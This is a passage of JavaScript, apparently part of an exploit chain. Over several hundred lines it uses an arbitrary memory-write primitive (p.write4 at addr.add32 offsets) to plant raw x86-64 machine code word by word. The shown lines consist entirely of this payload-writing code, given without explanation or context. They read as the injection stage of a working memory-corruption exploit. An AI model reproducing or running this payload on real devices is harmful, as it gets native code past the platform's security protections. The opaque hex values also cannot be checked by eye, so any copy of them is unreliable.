 300 |   p.write4(addr.add32(0x000004a8), 0x001d3c35);
 301 |   p.write4(addr.add32(0x000004ac), 0x0240e800);
 302 |   p.write4(addr.add32(0x000004b0), 0x3d8b0000);
 303 |   p.write4(addr.add32(0x000004b4), 0x00002050);
 304 |   p.write4(addr.add32(0x000004b8), 0xe9158d48);
 305 |   p.write4(addr.add32(0x000004bc), 0x48000020);
 306 |   p.write4(addr.add32(0x000004c0), 0x1d32358d);
 307 |   p.write4(addr.add32(0x000004c4), 0x27e80000);
 308 |   p.write4(addr.add32(0x000004c8), 0x8b000002);
 309 |   p.write4(addr.add32(0x000004cc), 0x0020373d);
 310 |   p.write4(addr.add32(0x000004d0), 0x158d4800);
 311 |   p.write4(addr.add32(0x000004d4), 0x00002050);
 312 |   p.write4(addr.add32(0x000004d8), 0x28358d48);
 313 |   p.write4(addr.add32(0x000004dc), 0xe800001d);
 314 |   p.write4(addr.add32(0x000004e0), 0x0000020e);
 315 |   p.write4(addr.add32(0x000004e4), 0x201e3d8b);
 316 |   p.write4(addr.add32(0x000004e8), 0x8d480000);
 317 |   p.write4(addr.add32(0x000004ec), 0x0020df15);
 318 |   p.write4(addr.add32(0x000004f0), 0x358d4800);
 319 |   p.write4(addr.add32(0x000004f4), 0x00001d1e);
 320 |   p.write4(addr.add32(0x000004f8), 0x0001f5e8);
 321 |   p.write4(addr.add32(0x000004fc), 0x053d8b00);
 322 |   p.write4(addr.add32(0x00000500), 0x48000020);
 323 |   p.write4(addr.add32(0x00000504), 0x1fee158d);
 324 |   p.write4(addr.add32(0x00000508), 0x8d480000);
 325 |   p.write4(addr.add32(0x0000050c), 0x001d1535);
 326 |   p.write4(addr.add32(0x00000510), 0x01dce800);
 327 |   p.write4(addr.add32(0x00000514), 0x3d8b0000);
 328 |   p.write4(addr.add32(0x00000518), 0x00001fec);
 329 |   p.write4(addr.add32(0x0000051c), 0x95158d48);
 330 |   p.write4(addr.add32(0x00000520), 0x48000020);
 331 |   p.write4(addr.add32(0x00000524), 0x1d12358d);
 332 |   p.write4(addr.add32(0x00000528), 0xc3e80000);
 333 |   p.write4(addr.add32(0x0000052c), 0x8b000001);
 334 |   p.write4(addr.add32(0x00000530), 0x001fd33d);
 335 |   p.write4(addr.add32(0x00000534), 0x158d4800);
 336 |   p.write4(addr.add32(0x00000538), 0x00001ff4);
 337 |   p.write4(addr.add32(0x0000053c), 0x11358d48);
 338 |   p.write4(addr.add32(0x00000540), 0xe800001d);
 339 |   p.write4(addr.add32(0x00000544), 0x000001aa);
 340 |   p.write4(addr.add32(0x00000548), 0x1fba3d8b);
 341 |   p.write4(addr.add32(0x0000054c), 0x8d480000);
 342 |   p.write4(addr.add32(0x00000550), 0x00201315);
 343 |   p.write4(addr.add32(0x00000554), 0x358d4800);
 344 |   p.write4(addr.add32(0x00000558), 0x00001d0f);
 345 |   p.write4(addr.add32(0x0000055c), 0x000191e8);
 346 |   p.write4(addr.add32(0x00000560), 0xa13d8b00);
 347 |   p.write4(addr.add32(0x00000564), 0x4800001f);
 348 |   p.write4(addr.add32(0x00000568), 0x209a158d);
 349 |   p.write4(addr.add32(0x0000056c), 0x8d480000);
 350 |   p.write4(addr.add32(0x00000570), 0x001cfd35);
 351 |   p.write4(addr.add32(0x00000574), 0x0178e800);
 352 |   p.write4(addr.add32(0x00000578), 0x3d8b0000);
 353 |   p.write4(addr.add32(0x0000057c), 0x00001f88);
 354 |   p.write4(addr.add32(0x00000580), 0xd1158d48);
 355 |   p.write4(addr.add32(0x00000584), 0x4800001f);
 356 |   p.write4(addr.add32(0x00000588), 0x1cf1358d);
 357 |   p.write4(addr.add32(0x0000058c), 0x5fe80000);
 358 |   p.write4(addr.add32(0x00000590), 0x8b000001);
 359 |   p.write4(addr.add32(0x00000594), 0x001f6f3d);
 360 |   p.write4(addr.add32(0x00000598), 0x158d4800);
 361 |   p.write4(addr.add32(0x0000059c), 0x00001f78);
 362 |   p.write4(addr.add32(0x000005a0), 0xe0358d48);
 363 |   p.write4(addr.add32(0x000005a4), 0xe800001c);
 364 |   p.write4(addr.add32(0x000005a8), 0x00000146);
 365 |   p.write4(addr.add32(0x000005ac), 0x1f563d8b);
 366 |   p.write4(addr.add32(0x000005b0), 0x8d480000);
 367 |   p.write4(addr.add32(0x000005b4), 0x00202715);
 368 |   p.write4(addr.add32(0x000005b8), 0x358d4800);
 369 |   p.write4(addr.add32(0x000005bc), 0x00001cce);
 370 |   p.write4(addr.add32(0x000005c0), 0x00012de8);
 371 |   p.write4(addr.add32(0x000005c4), 0x3d3d8b00);
 372 |   p.write4(addr.add32(0x000005c8), 0x4800001f);
 373 |   p.write4(addr.add32(0x000005cc), 0x1fde158d);
 374 |   p.write4(addr.add32(0x000005d0), 0x8d480000);
 375 |   p.write4(addr.add32(0x000005d4), 0x001cc235);
 376 |   p.write4(addr.add32(0x000005d8), 0x0114e800);
 377 |   p.write4(addr.add32(0x000005dc), 0x3d8b0000);
 378 |   p.write4(addr.add32(0x000005e0), 0x00001f24);
 379 |   p.write4(addr.add32(0x000005e4), 0xfd158d48);
 380 |   p.write4(addr.add32(0x000005e8), 0x4800001f);
 381 |   p.write4(addr.add32(0x000005ec), 0x1cc0358d);
 382 |   p.write4(addr.add32(0x000005f0), 0xfbe80000);
 383 |   p.write4(addr.add32(0x000005f4), 0x8b000000);
 384 |   p.write4(addr.add32(0x000005f8), 0x001f0b3d);
 385 |   p.write4(addr.add32(0x000005fc), 0x158d4800);
 386 |   p.write4(addr.add32(0x00000600), 0x00001f34);
 387 |   p.write4(addr.add32(0x00000604), 0xbd358d48);
 388 |   p.write4(addr.add32(0x00000608), 0xe800001c);
 389 |   p.write4(addr.add32(0x0000060c), 0x000000e2);
 390 |   p.write4(addr.add32(0x00000610), 0x1ef23d8b);
 391 |   p.write4(addr.add32(0x00000614), 0x8d480000);
 392 |   p.write4(addr.add32(0x00000618), 0x001fbb15);
 393 |   p.write4(addr.add32(0x0000061c), 0x358d4800);
 394 |   p.write4(addr.add32(0x00000620), 0x00001cba);
 395 |   p.write4(addr.add32(0x00000624), 0x0000c9e8);
 396 |   p.write4(addr.add32(0x00000628), 0xd93d8b00);
 397 |   p.write4(addr.add32(0x0000062c), 0x4800001e);
 398 |   p.write4(addr.add32(0x00000630), 0x1fca158d);
 399 |   p.write4(addr.add32(0x00000634), 0x8d480000);
 400 |   p.write4(addr.add32(0x00000638), 0x001cb735);
 401 |   p.write4(addr.add32(0x0000063c), 0x00b0e800);
 402 |   p.write4(addr.add32(0x00000640), 0x3d8b0000);
 403 |   p.write4(addr.add32(0x00000644), 0x00001ec0);
 404 |   p.write4(addr.add32(0x00000648), 0xf1158d48);
 405 |   p.write4(addr.add32(0x0000064c), 0x4800001e);
 406 |   p.write4(addr.add32(0x00000650), 0x1cb4358d);
 407 |   p.write4(addr.add32(0x00000654), 0x97e80000);
 408 |   p.write4(addr.add32(0x00000658), 0x8b000000);
 409 |   p.write4(addr.add32(0x0000065c), 0x001ea73d);
 410 |   p.write4(addr.add32(0x00000660), 0x158d4800);
 411 |   p.write4(addr.add32(0x00000664), 0x00001e98);
 412 |   p.write4(addr.add32(0x00000668), 0xa2358d48);
 413 |   p.write4(addr.add32(0x0000066c), 0xe800001c);
 414 |   p.write4(addr.add32(0x00000670), 0x0000007e);
 415 |   p.write4(addr.add32(0x00000674), 0x1e8e3d8b);
 416 |   p.write4(addr.add32(0x00000678), 0x8d480000);
 417 |   p.write4(addr.add32(0x0000067c), 0x001e9f15);
 418 |   p.write4(addr.add32(0x00000680), 0x358d4800);
 419 |   p.write4(addr.add32(0x00000684), 0x00001c90);
 420 |   p.write4(addr.add32(0x00000688), 0x000065e8);
 421 |   p.write4(addr.add32(0x0000068c), 0x753d8b00);
 422 |   p.write4(addr.add32(0x00000690), 0x4800001e);
 423 |   p.write4(addr.add32(0x00000694), 0x1f5e158d);
 424 |   p.write4(addr.add32(0x00000698), 0x8d480000);
 425 |   p.write4(addr.add32(0x0000069c), 0x001c7e35);
 426 |   p.write4(addr.add32(0x000006a0), 0x004ce800);
 427 |   p.write4(addr.add32(0x000006a4), 0x3d8b0000);
 428 |   p.write4(addr.add32(0x000006a8), 0x00001e5c);
 429 |   p.write4(addr.add32(0x000006ac), 0xd5158d48);
 430 |   p.write4(addr.add32(0x000006b0), 0x4800001e);
 431 |   p.write4(addr.add32(0x000006b4), 0x1c6c358d);
 432 |   p.write4(addr.add32(0x000006b8), 0x33e80000);
 433 |   p.write4(addr.add32(0x000006bc), 0x8b000000);
 434 |   p.write4(addr.add32(0x000006c0), 0x001e433d);
 435 |   p.write4(addr.add32(0x000006c4), 0x158d4800);
 436 |   p.write4(addr.add32(0x000006c8), 0x00001ef4);
 437 |   p.write4(addr.add32(0x000006cc), 0x5a358d48);
 438 |   p.write4(addr.add32(0x000006d0), 0xe800001c);
 439 |   p.write4(addr.add32(0x000006d4), 0x0000001a);
 440 |   p.write4(addr.add32(0x000006d8), 0x1e2a3d8b);
 441 |   p.write4(addr.add32(0x000006dc), 0x8d480000);
 442 |   p.write4(addr.add32(0x000006e0), 0x001e9315);
 443 |   p.write4(addr.add32(0x000006e4), 0x8d485800);
 444 |   p.write4(addr.add32(0x000006e8), 0x001c4935);
 445 |   p.write4(addr.add32(0x000006ec), 0x0000e900);
 446 |   p.write4(addr.add32(0x000006f0), 0xc7480000);
 447 |   p.write4(addr.add32(0x000006f4), 0x00024fc0);
 448 |   p.write4(addr.add32(0x000006f8), 0x0520e900);
 449 |   p.write4(addr.add32(0x000006fc), 0xc7480000);
 450 |   p.write4(addr.add32(0x00000700), 0x000250c0);
 451 |   p.write4(addr.add32(0x00000704), 0x0514e900);
 452 |   p.write4(addr.add32(0x00000708), 0x83480000);
 453 |   p.write4(addr.add32(0x0000070c), 0x894808ec);
 454 |   p.write4(addr.add32(0x00000710), 0x48d231f1);
 455 |   p.write4(addr.add32(0x00000714), 0x3145fe89);
 456 |   p.write4(addr.add32(0x00000718), 0x0252bfc0);
 457 |   p.write4(addr.add32(0x0000071c), 0xc0310000);
 458 |   p.write4(addr.add32(0x00000720), 0x0004f6e8);
 459 |   p.write4(addr.add32(0x00000724), 0x53c35a00);
 460 |   p.write4(addr.add32(0x00000728), 0x45c93145);
 461 |   p.write4(addr.add32(0x0000072c), 0xc931c031);
 462 |   p.write4(addr.add32(0x00000730), 0xf631d231);
 463 |   p.write4(addr.add32(0x00000734), 0x043d8d48);
 464 |   p.write4(addr.add32(0x00000738), 0xff00001c);
 465 |   p.write4(addr.add32(0x0000073c), 0x001e5f15);
 466 |   p.write4(addr.add32(0x00000740), 0x158d4800);
 467 |   p.write4(addr.add32(0x00000744), 0x00001f00);
 468 |   p.write4(addr.add32(0x00000748), 0x08358d48);
 469 |   p.write4(addr.add32(0x0000074c), 0x8900001c);
 470 |   p.write4(addr.add32(0x00000750), 0xe8c789c3);
 471 |   p.write4(addr.add32(0x00000754), 0xffffff9a);
 472 |   p.write4(addr.add32(0x00000758), 0x8d48df89);
 473 |   p.write4(addr.add32(0x0000075c), 0x00207f15);
 474 |   p.write4(addr.add32(0x00000760), 0x358d4800);
 475 |   p.write4(addr.add32(0x00000764), 0x00001bf6);
 476 |   p.write4(addr.add32(0x00000768), 0xffff85e8);
 477 |   p.write4(addr.add32(0x0000076c), 0x48df89ff);
 478 |   p.write4(addr.add32(0x00000770), 0x1efa158d);
 479 |   p.write4(addr.add32(0x00000774), 0x8d480000);
 480 |   p.write4(addr.add32(0x00000778), 0x001be635);
 481 |   p.write4(addr.add32(0x0000077c), 0xff70e800);
 482 |   p.write4(addr.add32(0x00000780), 0xdf89ffff);
 483 |   p.write4(addr.add32(0x00000784), 0x55158d48);
 484 |   p.write4(addr.add32(0x00000788), 0x4800001f);
 485 |   p.write4(addr.add32(0x0000078c), 0x1bd8358d);
 486 |   p.write4(addr.add32(0x00000790), 0x5be80000);
 487 |   p.write4(addr.add32(0x00000794), 0x89ffffff);
 488 |   p.write4(addr.add32(0x00000798), 0x158d48df);
 489 |   p.write4(addr.add32(0x0000079c), 0x00001fe0);
 490 |   p.write4(addr.add32(0x000007a0), 0xcb358d48);
 491 |   p.write4(addr.add32(0x000007a4), 0xe800001b);
 492 |   p.write4(addr.add32(0x000007a8), 0xffffff46);
 493 |   p.write4(addr.add32(0x000007ac), 0x8d48df89);
 494 |   p.write4(addr.add32(0x000007b0), 0x001f8b15);
 495 |   p.write4(addr.add32(0x000007b4), 0x358d4800);
 496 |   p.write4(addr.add32(0x000007b8), 0x00001bbf);
 497 |   p.write4(addr.add32(0x000007bc), 0xffff31e8);
 498 |   p.write4(addr.add32(0x000007c0), 0x48df89ff);
 499 |   p.write4(addr.add32(0x000007c4), 0x1e66158d);
 500 |   p.write4(addr.add32(0x000007c8), 0x8d480000);
 501 |   p.write4(addr.add32(0x000007cc), 0x001bb135);
 502 |   p.write4(addr.add32(0x000007d0), 0xff1ce800);
 503 |   p.write4(addr.add32(0x000007d4), 0xdf89ffff);
 504 |   p.write4(addr.add32(0x000007d8), 0x11158d48);
 505 |   p.write4(addr.add32(0x000007dc), 0x4800001f);
 506 |   p.write4(addr.add32(0x000007e0), 0x1ba3358d);
 507 |   p.write4(addr.add32(0x000007e4), 0x07e80000);
 508 |   p.write4(addr.add32(0x000007e8), 0x89ffffff);
 509 |   p.write4(addr.add32(0x000007ec), 0x158d48df);
 510 |   p.write4(addr.add32(0x000007f0), 0x00001e1c);
 511 |   p.write4(addr.add32(0x000007f4), 0x95358d48);
 512 |   p.write4(addr.add32(0x000007f8), 0xe800001b);
 513 |   p.write4(addr.add32(0x000007fc), 0xfffffef2);
 514 |   p.write4(addr.add32(0x00000800), 0x8d48df89);
 515 |   p.write4(addr.add32(0x00000804), 0x001ecf15);
 516 |   p.write4(addr.add32(0x00000808), 0x358d4800);
 517 |   p.write4(addr.add32(0x0000080c), 0x00001b87);
 518 |   p.write4(addr.add32(0x00000810), 0xfffedde8);
 519 |   p.write4(addr.add32(0x00000814), 0x48df89ff);
 520 |   p.write4(addr.add32(0x00000818), 0x1e7a158d);
 521 |   p.write4(addr.add32(0x0000081c), 0x8d480000);
 522 |   p.write4(addr.add32(0x00000820), 0x001b7a35);
 523 |   p.write4(addr.add32(0x00000824), 0xfec8e800);
 524 |   p.write4(addr.add32(0x00000828), 0xdf89ffff);
 525 |   p.write4(addr.add32(0x0000082c), 0xcd158d48);
 526 |   p.write4(addr.add32(0x00000830), 0x4800001e);
 527 |   p.write4(addr.add32(0x00000834), 0x1b6c358d);
 528 |   p.write4(addr.add32(0x00000838), 0xb3e80000);
 529 |   p.write4(addr.add32(0x0000083c), 0x89fffffe);
 530 |   p.write4(addr.add32(0x00000840), 0x158d48df);
 531 |   p.write4(addr.add32(0x00000844), 0x00001f78);
 532 |   p.write4(addr.add32(0x00000848), 0x5f358d48);
 533 |   p.write4(addr.add32(0x0000084c), 0xe800001b);
 534 |   p.write4(addr.add32(0x00000850), 0xfffffe9e);
 535 |   p.write4(addr.add32(0x00000854), 0x8d48df89);
 536 |   p.write4(addr.add32(0x00000858), 0x001f1315);
 537 |   p.write4(addr.add32(0x0000085c), 0x358d4800);
 538 |   p.write4(addr.add32(0x00000860), 0x00001b51);
 539 |   p.write4(addr.add32(0x00000864), 0xfffe89e8);
 540 |   p.write4(addr.add32(0x00000868), 0x48df89ff);
 541 |   p.write4(addr.add32(0x0000086c), 0x1e5e158d);
 542 |   p.write4(addr.add32(0x00000870), 0x8d480000);
 543 |   p.write4(addr.add32(0x00000874), 0x001b4335);
 544 |   p.write4(addr.add32(0x00000878), 0xfe74e800);
 545 |   p.write4(addr.add32(0x0000087c), 0xdf89ffff);
 546 |   p.write4(addr.add32(0x00000880), 0x01158d48);
 547 |   p.write4(addr.add32(0x00000884), 0x4800001f);
 548 |   p.write4(addr.add32(0x00000888), 0x1b36358d);
 549 |   p.write4(addr.add32(0x0000088c), 0x5fe80000);
 550 |   p.write4(addr.add32(0x00000890), 0x89fffffe);
 551 |   p.write4(addr.add32(0x00000894), 0x158d48df);
 552 |   p.write4(addr.add32(0x00000898), 0x00001d8c);
 553 |   p.write4(addr.add32(0x0000089c), 0x29358d48);
 554 |   p.write4(addr.add32(0x000008a0), 0xe800001b);
 555 |   p.write4(addr.add32(0x000008a4), 0xfffffe4a);
 556 |   p.write4(addr.add32(0x000008a8), 0x8d48df89);
 557 |   p.write4(addr.add32(0x000008ac), 0x001e4715);
 558 |   p.write4(addr.add32(0x000008b0), 0x358d4800);
 559 |   p.write4(addr.add32(0x000008b4), 0x00001b1d);
 560 |   p.write4(addr.add32(0x000008b8), 0xfffe35e8);
 561 |   p.write4(addr.add32(0x000008bc), 0x48df89ff);
 562 |   p.write4(addr.add32(0x000008c0), 0x1f02158d);
 563 |   p.write4(addr.add32(0x000008c4), 0x8d480000);
 564 |   p.write4(addr.add32(0x000008c8), 0x001b0f35);
 565 |   p.write4(addr.add32(0x000008cc), 0xfe20e800);
 566 |   p.write4(addr.add32(0x000008d0), 0xdf89ffff);
 567 |   p.write4(addr.add32(0x000008d4), 0x8d158d48);
 568 |   p.write4(addr.add32(0x000008d8), 0x4800001d);
 569 |   p.write4(addr.add32(0x000008dc), 0x1b01358d);
 570 |   p.write4(addr.add32(0x000008e0), 0x0be80000);
 571 |   p.write4(addr.add32(0x000008e4), 0x89fffffe);
 572 |   p.write4(addr.add32(0x000008e8), 0x158d48df);
 573 |   p.write4(addr.add32(0x000008ec), 0x00001dc0);
 574 |   p.write4(addr.add32(0x000008f0), 0xf4358d48);
 575 |   p.write4(addr.add32(0x000008f4), 0xe800001a);
 576 |   p.write4(addr.add32(0x000008f8), 0xfffffdf6);
 577 |   p.write4(addr.add32(0x000008fc), 0x8d48df89);
 578 |   p.write4(addr.add32(0x00000900), 0x001e1315);
 579 |   p.write4(addr.add32(0x00000904), 0x358d4800);
 580 |   p.write4(addr.add32(0x00000908), 0x00001ae6);
 581 |   p.write4(addr.add32(0x0000090c), 0xfffde1e8);
 582 |   p.write4(addr.add32(0x00000910), 0x48df89ff);
 583 |   p.write4(addr.add32(0x00000914), 0x1e06158d);
 584 |   p.write4(addr.add32(0x00000918), 0x8d480000);
 585 |   p.write4(addr.add32(0x0000091c), 0x001ad935);
 586 |   p.write4(addr.add32(0x00000920), 0xfdcce800);
 587 |   p.write4(addr.add32(0x00000924), 0xdf89ffff);
 588 |   p.write4(addr.add32(0x00000928), 0x49158d48);
 589 |   p.write4(addr.add32(0x0000092c), 0x4800001d);
 590 |   p.write4(addr.add32(0x00000930), 0x1ac3358d);
 591 |   p.write4(addr.add32(0x00000934), 0xb7e80000);
 592 |   p.write4(addr.add32(0x00000938), 0x89fffffd);
 593 |   p.write4(addr.add32(0x0000093c), 0x158d48df);
 594 |   p.write4(addr.add32(0x00000940), 0x00001e5c);
 595 |   p.write4(addr.add32(0x00000944), 0xb5358d48);
 596 |   p.write4(addr.add32(0x00000948), 0xe800001a);
 597 |   p.write4(addr.add32(0x0000094c), 0xfffffda2);
 598 |   p.write4(addr.add32(0x00000950), 0x8d48df89);
 599 |   p.write4(addr.add32(0x00000954), 0x001e5715);
 600 |   p.write4(addr.add32(0x00000958), 0x358d4800);
 601 |   p.write4(addr.add32(0x0000095c), 0x00001aa8);
 602 |   p.write4(addr.add32(0x00000960), 0xfffd8de8);
 603 |   p.write4(addr.add32(0x00000964), 0x48df89ff);
 604 |   p.write4(addr.add32(0x00000968), 0x1d5a158d);
 605 |   p.write4(addr.add32(0x0000096c), 0x8d480000);
 606 |   p.write4(addr.add32(0x00000970), 0x001a9835);
 607 |   p.write4(addr.add32(0x00000974), 0xfd78e800);
 608 |   p.write4(addr.add32(0x00000978), 0xdf89ffff);
 609 |   p.write4(addr.add32(0x0000097c), 0x9d158d48);
 610 |   p.write4(addr.add32(0x00000980), 0x4800001c);
 611 |   p.write4(addr.add32(0x00000984), 0x1a8b358d);
 612 |   p.write4(addr.add32(0x00000988), 0x63e80000);
 613 |   p.write4(addr.add32(0x0000098c), 0x89fffffd);
 614 |   p.write4(addr.add32(0x00000990), 0x158d48df);
 615 |   p.write4(addr.add32(0x00000994), 0x00001ce8);
 616 |   p.write4(addr.add32(0x00000998), 0x7f358d48);
 617 |   p.write4(addr.add32(0x0000099c), 0xe800001a);
 618 |   p.write4(addr.add32(0x000009a0), 0xfffffd4e);
 619 |   p.write4(addr.add32(0x000009a4), 0x8d48df89);
 620 |   p.write4(addr.add32(0x000009a8), 0x001d6315);
 621 |   p.write4(addr.add32(0x000009ac), 0x358d4800);
 622 |   p.write4(addr.add32(0x000009b0), 0x00001a75);
 623 |   p.write4(addr.add32(0x000009b4), 0xfffd39e8);
 624 |   p.write4(addr.add32(0x000009b8), 0x48df89ff);
 625 |   p.write4(addr.add32(0x000009bc), 0x1d26158d);
 626 |   p.write4(addr.add32(0x000009c0), 0x8d480000);
 627 |   p.write4(addr.add32(0x000009c4), 0x001a6735);
 628 |   p.write4(addr.add32(0x000009c8), 0xfd24e800);
 629 |   p.write4(addr.add32(0x000009cc), 0xdf89ffff);
 630 |   p.write4(addr.add32(0x000009d0), 0x79158d48);
 631 |   p.write4(addr.add32(0x000009d4), 0x4800001d);
 632 |   p.write4(addr.add32(0x000009d8), 0x1a58358d);
 633 |   p.write4(addr.add32(0x000009dc), 0x0fe80000);
 634 |   p.write4(addr.add32(0x000009e0), 0x89fffffd);
 635 |   p.write4(addr.add32(0x000009e4), 0x158d48df);
 636 |   p.write4(addr.add32(0x000009e8), 0x00001ccc);
 637 |   p.write4(addr.add32(0x000009ec), 0x44358d48);
 638 |   p.write4(addr.add32(0x000009f0), 0xe800001a);
 639 |   p.write4(addr.add32(0x000009f4), 0xfffffcfa);
 640 |   p.write4(addr.add32(0x000009f8), 0x8d48df89);
 641 |   p.write4(addr.add32(0x000009fc), 0x001c1715);
 642 |   p.write4(addr.add32(0x00000a00), 0x358d4800);
 643 |   p.write4(addr.add32(0x00000a04), 0x00001a34);
 644 |   p.write4(addr.add32(0x00000a08), 0xfffce5e8);
 645 |   p.write4(addr.add32(0x00000a0c), 0x48df89ff);
 646 |   p.write4(addr.add32(0x00000a10), 0x1d1a158d);
 647 |   p.write4(addr.add32(0x00000a14), 0x8d480000);
 648 |   p.write4(addr.add32(0x00000a18), 0x001a2735);
 649 |   p.write4(addr.add32(0x00000a1c), 0xfcd0e800);
 650 |   p.write4(addr.add32(0x00000a20), 0xdf89ffff);
 651 |   p.write4(addr.add32(0x00000a24), 0x65158d48);
 652 |   p.write4(addr.add32(0x00000a28), 0x4800001c);
 653 |   p.write4(addr.add32(0x00000a2c), 0x1a0c358d);
 654 |   p.write4(addr.add32(0x00000a30), 0xbbe80000);
 655 |   p.write4(addr.add32(0x00000a34), 0x89fffffc);
 656 |   p.write4(addr.add32(0x00000a38), 0x158d48df);
 657 |   p.write4(addr.add32(0x00000a3c), 0x00001d50);
 658 |   p.write4(addr.add32(0x00000a40), 0xff358d48);
 659 |   p.write4(addr.add32(0x00000a44), 0xe8000019);
 660 |   p.write4(addr.add32(0x00000a48), 0xfffffca6);
 661 |   p.write4(addr.add32(0x00000a4c), 0x8d48df89);
 662 |   p.write4(addr.add32(0x00000a50), 0x001d0b15);
 663 |   p.write4(addr.add32(0x00000a54), 0x358d4800);
 664 |   p.write4(addr.add32(0x00000a58), 0x000019e3);
 665 |   p.write4(addr.add32(0x00000a5c), 0xfffc91e8);
 666 |   p.write4(addr.add32(0x00000a60), 0x48df89ff);
 667 |   p.write4(addr.add32(0x00000a64), 0x1d4e158d);
 668 |   p.write4(addr.add32(0x00000a68), 0x8d480000);
 669 |   p.write4(addr.add32(0x00000a6c), 0x0019dd35);
 670 |   p.write4(addr.add32(0x00000a70), 0xfc7ce800);
 671 |   p.write4(addr.add32(0x00000a74), 0xdf89ffff);
 672 |   p.write4(addr.add32(0x00000a78), 0xf9158d48);
 673 |   p.write4(addr.add32(0x00000a7c), 0x4800001c);
 674 |   p.write4(addr.add32(0x00000a80), 0x19cf358d);
 675 |   p.write4(addr.add32(0x00000a84), 0x67e80000);
 676 |   p.write4(addr.add32(0x00000a88), 0x89fffffc);
 677 |   p.write4(addr.add32(0x00000a8c), 0x158d48df);
 678 |   p.write4(addr.add32(0x00000a90), 0x00001ca4);
 679 |   p.write4(addr.add32(0x00000a94), 0xc3358d48);
 680 |   p.write4(addr.add32(0x00000a98), 0xe8000019);
 681 |   p.write4(addr.add32(0x00000a9c), 0xfffffc52);
 682 |   p.write4(addr.add32(0x00000aa0), 0x8d48df89);
 683 |   p.write4(addr.add32(0x00000aa4), 0x001cef15);
 684 |   p.write4(addr.add32(0x00000aa8), 0x358d4800);
 685 |   p.write4(addr.add32(0x00000aac), 0x000019b8);
 686 |   p.write4(addr.add32(0x00000ab0), 0xfffc3de8);
 687 |   p.write4(addr.add32(0x00000ab4), 0x48df89ff);
 688 |   p.write4(addr.add32(0x00000ab8), 0x1bea158d);
 689 |   p.write4(addr.add32(0x00000abc), 0x8d480000);
 690 |   p.write4(addr.add32(0x00000ac0), 0x0019af35);
 691 |   p.write4(addr.add32(0x00000ac4), 0xfc28e800);
 692 |   p.write4(addr.add32(0x00000ac8), 0xdf89ffff);
 693 |   p.write4(addr.add32(0x00000acc), 0x95158d48);
 694 |   p.write4(addr.add32(0x00000ad0), 0x4800001c);
 695 |   p.write4(addr.add32(0x00000ad4), 0x19a1358d);
 696 |   p.write4(addr.add32(0x00000ad8), 0x13e80000);
 697 |   p.write4(addr.add32(0x00000adc), 0x89fffffc);
 698 |   p.write4(addr.add32(0x00000ae0), 0x158d48df);
 699 |   p.write4(addr.add32(0x00000ae4), 0x00001b78);
 700 |   p.write4(addr.add32(0x00000ae8), 0x94358d48);
 701 |   p.write4(addr.add32(0x00000aec), 0xe8000019);
 702 |   p.write4(addr.add32(0x00000af0), 0xfffffbfe);
 703 |   p.write4(addr.add32(0x00000af4), 0x8d48df89);
 704 |   p.write4(addr.add32(0x00000af8), 0x001b5315);
 705 |   p.write4(addr.add32(0x00000afc), 0x358d4800);
 706 |   p.write4(addr.add32(0x00000b00), 0x00001987);
 707 |   p.write4(addr.add32(0x00000b04), 0xfffbe9e8);
 708 |   p.write4(addr.add32(0x00000b08), 0x48df89ff);
 709 |   p.write4(addr.add32(0x00000b0c), 0x1cc6158d);
 710 |   p.write4(addr.add32(0x00000b10), 0x8d480000);
 711 |   p.write4(addr.add32(0x00000b14), 0x00197c35);
 712 |   p.write4(addr.add32(0x00000b18), 0xfbd4e800);
 713 |   p.write4(addr.add32(0x00000b1c), 0xdf89ffff);
 714 |   p.write4(addr.add32(0x00000b20), 0x11158d48);
 715 |   p.write4(addr.add32(0x00000b24), 0x4800001b);
 716 |   p.write4(addr.add32(0x00000b28), 0x196f358d);
 717 |   p.write4(addr.add32(0x00000b2c), 0xbfe80000);
 718 |   p.write4(addr.add32(0x00000b30), 0x89fffffb);
 719 |   p.write4(addr.add32(0x00000b34), 0x158d48df);
 720 |   p.write4(addr.add32(0x00000b38), 0x00001b04);
 721 |   p.write4(addr.add32(0x00000b3c), 0x62358d48);
 722 |   p.write4(addr.add32(0x00000b40), 0xe8000019);
 723 |   p.write4(addr.add32(0x00000b44), 0xfffffbaa);
 724 |   p.write4(addr.add32(0x00000b48), 0x8d48df89);
 725 |   p.write4(addr.add32(0x00000b4c), 0x001c7f15);
 726 |   p.write4(addr.add32(0x00000b50), 0x358d4800);
 727 |   p.write4(addr.add32(0x00000b54), 0x00001957);
 728 |   p.write4(addr.add32(0x00000b58), 0xfffb95e8);
 729 |   p.write4(addr.add32(0x00000b5c), 0x48df89ff);
 730 |   p.write4(addr.add32(0x00000b60), 0x1b5a158d);
 731 |   p.write4(addr.add32(0x00000b64), 0x8d480000);
 732 |   p.write4(addr.add32(0x00000b68), 0x00194b35);
 733 |   p.write4(addr.add32(0x00000b6c), 0xfb80e800);
 734 |   p.write4(addr.add32(0x00000b70), 0xdf89ffff);
 735 |   p.write4(addr.add32(0x00000b74), 0xdd158d48);
 736 |   p.write4(addr.add32(0x00000b78), 0x4800001a);
 737 |   p.write4(addr.add32(0x00000b7c), 0x193c358d);
 738 |   p.write4(addr.add32(0x00000b80), 0x6be80000);
 739 |   p.write4(addr.add32(0x00000b84), 0x89fffffb);
 740 |   p.write4(addr.add32(0x00000b88), 0x158d48df);
 741 |   p.write4(addr.add32(0x00000b8c), 0x00001b98);
 742 |   p.write4(addr.add32(0x00000b90), 0x33358d48);
 743 |   p.write4(addr.add32(0x00000b94), 0xe8000019);
 744 |   p.write4(addr.add32(0x00000b98), 0xfffffb56);
 745 |   p.write4(addr.add32(0x00000b9c), 0x8d48df89);
 746 |   p.write4(addr.add32(0x00000ba0), 0x001b6315);
 747 |   p.write4(addr.add32(0x00000ba4), 0x358d4800);
 748 |   p.write4(addr.add32(0x00000ba8), 0x00001924);
 749 |   p.write4(addr.add32(0x00000bac), 0xfffb41e8);
 750 |   p.write4(addr.add32(0x00000bb0), 0x48df89ff);
 751 |   p.write4(addr.add32(0x00000bb4), 0x1bee158d);
 752 |   p.write4(addr.add32(0x00000bb8), 0x8d480000);
 753 |   p.write4(addr.add32(0x00000bbc), 0x00191535);
 754 |   p.write4(addr.add32(0x00000bc0), 0xfb2ce800);
 755 |   p.write4(addr.add32(0x00000bc4), 0xdf89ffff);
 756 |   p.write4(addr.add32(0x00000bc8), 0xd1158d48);
 757 |   p.write4(addr.add32(0x00000bcc), 0x4800001a);
 758 |   p.write4(addr.add32(0x00000bd0), 0x1907358d);
 759 |   p.write4(addr.add32(0x00000bd4), 0x17e80000);
 760 |   p.write4(addr.add32(0x00000bd8), 0x89fffffb);
 761 |   p.write4(addr.add32(0x00000bdc), 0x158d48df);
